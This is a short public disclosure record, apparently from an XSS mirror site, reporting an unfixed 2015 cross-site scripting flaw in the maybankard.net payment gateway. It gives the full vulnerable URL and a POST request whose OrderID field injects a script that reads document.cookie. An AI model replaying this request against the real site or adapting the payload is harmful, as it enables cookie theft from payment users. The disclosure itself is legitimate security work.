Security researcher SaifuddinAmri, has submitted on 05/03/2015 a cross-site-scripting (XSS) vulnerability affecting www.maybankard.net, which at the time of submission ranked 166631 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/03/2015. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/03/2015 |
Date published: 10/03/2015 |
Fixed? Mail us! | Status: UNFIXED |
Author: SaifuddinAmri |
Domain: www.maybankard.net |
Category: XSS |
Pagerank: 166631 |
URL: https://www.maybankard.net/SENTRY/PaymentGateway/Application/RedirectLink.aspx |
POST: Version=1.0.0&MerRespURL=https://epayment.johor.gov.my/sentry/receive&MerID=027007010432&PurchaseCur rency=458&PurchaseCurrencyExponent=2&AcqID=450618&OrderID="><script>alert(document.cookie)</script>& SignatureMethod=SHA1&PurchaseAmt=000000016800&Signature=DsdptLJHhKSJ8zIRomdSBQnjFrQ= |
Click here to view the mirror
|
|
|